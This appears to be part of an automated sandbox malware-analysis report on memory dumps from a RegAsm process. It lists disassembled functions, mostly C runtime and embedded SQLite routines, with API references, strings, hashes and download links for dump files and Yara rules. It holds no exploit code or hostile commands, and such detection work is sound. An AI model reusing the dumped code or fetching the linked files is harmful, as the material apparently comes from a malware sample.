Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 5497b47861034db8a28accfcaa8c0664e2c3869df264b886a26cba9de26b33a9
Instruction ID: 224513d2d5bc07f586ea6cb706929cd3d39e9f052772c3832985b833f68f98ca
Opcode Fuzzy Hash: 5497b47861034db8a28accfcaa8c0664e2c3869df264b886a26cba9de26b33a9
Instruction Fuzzy Hash: 47F0E9362001697BDB111F599C48D9BBF2EEF47765B040062FE0893210D771695587E5

Function 0041B4B1 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B4BD

Part of subcall function 0041B694: __getptd_noexit.LIBCMT ref: 0041B697
Part of subcall function 0041B694: __amsg_exit.LIBCMT ref: 0041B6A4

__getptd.LIBCMT ref: 0041B4D4
__amsg_exit.LIBCMT ref: 0041B4E2
__lock.LIBCMT ref: 0041B4F2
__updatetlocinfoEx_nolock.LIBCMT ref: 0041B506

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: fbaaa929d48c55b61e37e9ae66ee770613ac542efda0ba32a491a2da32ce27ab
Instruction ID: 0ebb81aeb13a9dd4fdfb8b99cdb1e4f409ac29d7c9718700e9c8812a1a9662ee
Opcode Fuzzy Hash: fbaaa929d48c55b61e37e9ae66ee770613ac542efda0ba32a491a2da32ce27ab
Instruction Fuzzy Hash: FEF04F32A41610ABDA30BB6A5806B9932A09B54728F51811FE40456293DB6C59C19A9E

Function 004083D3 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004083D8

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

lstrlenA.KERNEL32(00000000), ref: 00408927
lstrlenA.KERNEL32(00000000), ref: 0040893B

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

#, xrefs: 0040896B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
String ID: #
API String ID: 3207582090-1885708031
Opcode ID: d9a721d345bafec959c3f772c011f9643a702f686a7313f9ad3c6e51266c326b
Instruction ID: 39fa0caab08c73d3c430591b0cff4141670013a3961778f59104806e6e9ba325
Opcode Fuzzy Hash: d9a721d345bafec959c3f772c011f9643a702f686a7313f9ad3c6e51266c326b
Instruction Fuzzy Hash: 6B12507180428CEADF15E7E1C956BEEBB78AF14308F10409EE44563182EFB817D9DB66

Function 1B4F73C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 1B4F751C

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: 8f4436af8e146d17a9ff8da65d7cd0be883466ef3f4ddddb27d84f307d0cc9df
Instruction ID: ff19ea4ac967b64569e7b4f070ae00d01ac2cb6a222f4755f8d78a4a9a0c371a
Opcode Fuzzy Hash: 8f4436af8e146d17a9ff8da65d7cd0be883466ef3f4ddddb27d84f307d0cc9df
Instruction Fuzzy Hash: 0CB18DB09043519FD711CF28C880B9ABBE8BF94348F44891EF8C5D7241E779E589CB96

Function 1B3EF7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 1B3EF8ED

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 7ced3fea76ff23da7a00f4d067946e20e5d1a461f433045e7297faa2b94e67bf
Instruction ID: 771719b065adb40aeae83cf0afe2e18ce531d4a38516996360811f94e9125ca4
Opcode Fuzzy Hash: 7ced3fea76ff23da7a00f4d067946e20e5d1a461f433045e7297faa2b94e67bf
Instruction Fuzzy Hash: 6711D376C04B216AEF01BF24BC01BC677A15F16324F05435AF4995A1A2F7A095E5C3E2

Function 1B3E7D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap3, xrefs: 1B3E7F1D
winShmMap2, xrefs: 1B3E7E1F
winShmMap1, xrefs: 1B3E7DC5

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 3b1fb214fec25891afadc7e5804325bd091e4083dc25d8800907ac10dec02f51
Instruction ID: e6bc60981ce191909f11f76e56dafa97d57b9f4d4759badc6c0a36881ccfa8a6
Opcode Fuzzy Hash: 3b1fb214fec25891afadc7e5804325bd091e4083dc25d8800907ac10dec02f51
Instruction Fuzzy Hash: 6C61E3B1504311DFDB15CF25CC91AA7B7E9AF84744F01496EF9829B251EB30E82ACB62

Function 1B4135E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4135EA
%s at line %d of [%.10s], xrefs: 1B4135F9
misuse, xrefs: 1B4135F4

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: e443457d688aeea8e103d58e000b374cde6489663c546ad7c937c1c7181b3b43
Instruction ID: 338a565cf16886206a5771e039ba552b992c766d88cb9dae1a01dfa934f9e7df
Opcode Fuzzy Hash: e443457d688aeea8e103d58e000b374cde6489663c546ad7c937c1c7181b3b43
Instruction Fuzzy Hash: D051AEF5E00311AFDB149F18C884A96BBA5BF44625F09C25DF8A99F352D331F854CBA2

Function 1B4896B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4897E0
%s at line %d of [%.10s], xrefs: 1B4897EF
database corruption, xrefs: 1B4897EA

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 95330cee4763e06c6fd7d7226f22ef5516e6eab7bae80b3dca130e046ac94907
Instruction ID: 6b8a19dd3a5b2d8ba92e31f34c3e4be9d4da83099cfdd9233a8019daff44b365
Opcode Fuzzy Hash: 95330cee4763e06c6fd7d7226f22ef5516e6eab7bae80b3dca130e046ac94907
Instruction Fuzzy Hash: 2741397A604B908ED7229FBC94406D7FFE0DF41211F5888AED2D68B752E322E486D761

Function 1B555960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B555976
%s at line %d of [%.10s], xrefs: 1B555985
misuse, xrefs: 1B555980

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 5932a36902a710f75a47a3555b58e1d8784d4e861c4a94dd0bfc4fa669cdb594
Instruction ID: c67cb0cfe6cbf803131cea8a665ae4c9772029a41e4b30d85c175fe0cd0f7e0c
Opcode Fuzzy Hash: 5932a36902a710f75a47a3555b58e1d8784d4e861c4a94dd0bfc4fa669cdb594
Instruction Fuzzy Hash: 6D412776D04341ABE7009B54EC81BDAB7E4AF84326F88056BF88497241E729F994C7A2

Function 1B568850 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 1B5688E2
delayed %dms for lock/sharing conflict at line %d, xrefs: 1B56895F

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 0-1037342196
Opcode ID: d8c9a132b927a3b617babccbb54f231746958e533bcca528c67fa60b1f091737
Instruction ID: cb25adc5a854fc2bdd65491328cf8633ef96c3f85002322b446378f365a63723
Opcode Fuzzy Hash: d8c9a132b927a3b617babccbb54f231746958e533bcca528c67fa60b1f091737
Instruction Fuzzy Hash: C8218EB15083469FF7209714CC85BFBFBD9AFD4300F444C2DE58882152C23098448353

Function 1B415390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4153FE
%s at line %d of [%.10s], xrefs: 1B41540D
database corruption, xrefs: 1B415408

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c472d926ccd9047ce2616556809329a77760c8dcd492f9c569d037087806f675
Instruction ID: 02299ee7c069a7dcfa19ebfcd0dca22982ea4b86001573ab4ea7e2f8dd11616c
Opcode Fuzzy Hash: c472d926ccd9047ce2616556809329a77760c8dcd492f9c569d037087806f675
Instruction Fuzzy Hash: 14316A39E407A146E7218F3898417E6B7E09F41612F4C846EE9C5DF781E326F492C3E2

Function 1B4F7ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 1B4F7F92
no such tokenizer: %s, xrefs: 1B4F7F1B

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: 7e85b577cfe04829b482713436bd15f1fe8934d470c42dd8170af64879c90812
Instruction ID: 56fc1238ff38127aface822b34564836ab114ad19ef9f903cf72bf53f04395f0
Opcode Fuzzy Hash: 7e85b577cfe04829b482713436bd15f1fe8934d470c42dd8170af64879c90812
Instruction Fuzzy Hash: 29317C76B002159FDB20CF1DD880BAAB7E4EF85665F15856DE988DB300E736EC06CB61

Function 1B3DF000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 1B3DF0C4

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: 027d6ed14356c98ad9301e44330258b41c3a531cdc044f2a62e8cf33ae0818b7
Instruction ID: a45e96eedf57ea563ca3545c7b6aa2070c67cdf4070cd3235c73157875905859
Opcode Fuzzy Hash: 027d6ed14356c98ad9301e44330258b41c3a531cdc044f2a62e8cf33ae0818b7
Instruction Fuzzy Hash: FC312877D043029BDB11BF15DCC1696B3A4BF40725FC04A29FCA5A7291E732F9748692

Function 1B415280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4152F2
%s at line %d of [%.10s], xrefs: 1B415301
database corruption, xrefs: 1B4152FC

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
